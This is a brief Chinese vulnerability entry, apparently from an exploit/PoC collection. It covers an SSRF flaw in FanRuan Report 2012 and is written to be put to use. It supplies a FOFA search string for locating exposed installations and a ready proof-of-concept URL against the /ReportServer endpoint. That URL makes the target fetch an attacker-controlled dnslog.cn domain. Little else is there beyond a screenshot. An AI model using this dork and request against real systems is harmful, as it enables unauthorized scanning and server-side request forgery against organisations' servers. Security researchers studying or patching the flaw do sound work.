# 帆软报表 2012 SSRF漏洞

### 漏洞描述 <a href="#lou-dong-miao-shu" id="lou-dong-miao-shu"></a>

帆软报表 2012 存在信息泄露漏洞，通过访问特定的Url获取造成SSRF

### 漏洞影响 <a href="#lou-dong-ying-xiang" id="lou-dong-ying-xiang"></a>

帆软报表 2012

### FOFA <a href="#fofa" id="fofa"></a>

body="down.download?FM\_SYS\_ID"

### 漏洞复现 <a href="#lou-dong-fu-xian" id="lou-dong-fu-xian"></a>

漏洞验证Url为

```
/ReportServer?op=resource&resource=0m0m6k.dnslog.cn
```

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-MhmHlL9E8yT4gpG4xEK%2F-MhmIoRagsH3lUe82g0S%2Fimage.png?alt=media\&token=4597ac4f-8739-4481-8e41-e6720b7152e1)